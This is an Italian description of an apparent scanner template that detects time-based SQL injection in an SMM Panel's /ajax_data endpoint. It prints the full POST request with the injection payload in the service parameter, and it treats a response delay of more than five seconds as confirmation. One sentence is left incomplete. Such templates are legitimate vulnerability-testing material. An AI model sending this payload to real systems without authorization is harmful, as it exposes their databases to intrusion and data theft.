
Modello di rilevamento SQL injection basato sul tempo per SMM Panel che mira al parametro service_detail tramite richieste POST formulate a /ajax_data, utilizzando il ritardo di risposta per confermare la vulnerabilità.
Rilevamento di SQL Injection basata sul tempo per SMM Panel
Questo template rileva una vulnerabilità di SQL Injection basata sul tempo nel parametro service_detail del pannello SMM tramite richieste HTTP POST a /ajax_data. Lo sfruttamento può consentire a un attaccante remoto di accedere a dati sensibili o di eseguire escalation dei privilegi.
Lo strumento invia una richiesta POST costruita ad arte:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
Se il tempo di risposta è , indica un endpoint vulnerabile.
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds
